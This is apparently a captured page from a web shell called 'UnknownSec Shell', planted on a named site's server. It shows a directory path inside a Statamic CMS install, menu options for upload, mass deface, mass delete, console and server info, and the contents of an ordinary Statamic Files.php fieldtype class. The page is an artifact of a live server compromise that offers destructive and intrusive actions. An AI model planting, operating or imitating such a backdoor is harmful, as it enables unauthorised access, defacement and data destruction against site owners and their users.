shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Fieldtypes
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Files.php
<?php namespace Statamic\Fieldtypes; use Statamic\Fields\Fieldtype; class Files extends Fieldtype { protected $selectable = false; protected $selectableInForms = true; protected $categories = ['media']; protected function configFieldItems(): array { return [ 'max_files' => [ 'display' => __('Max Files'), 'instructions' => __('statamic::fieldtypes.assets.config.max_files'), 'min' => 1, 'type' => 'integer', ], ]; } public function preload() { return [ 'uploadUrl' => cp_route('files.upload'), ]; } public function preProcess($data) { return $data ?? []; } public function process($values) { return $this->config('max_files') === 1 ? collect($values)->first() : $values; } public function rules(): array { $rules = ['array']; if ($max = $this->config('max_files')) { $rules[] = 'max:'.$max; } return $rules; } }
© 2026 UnknownSec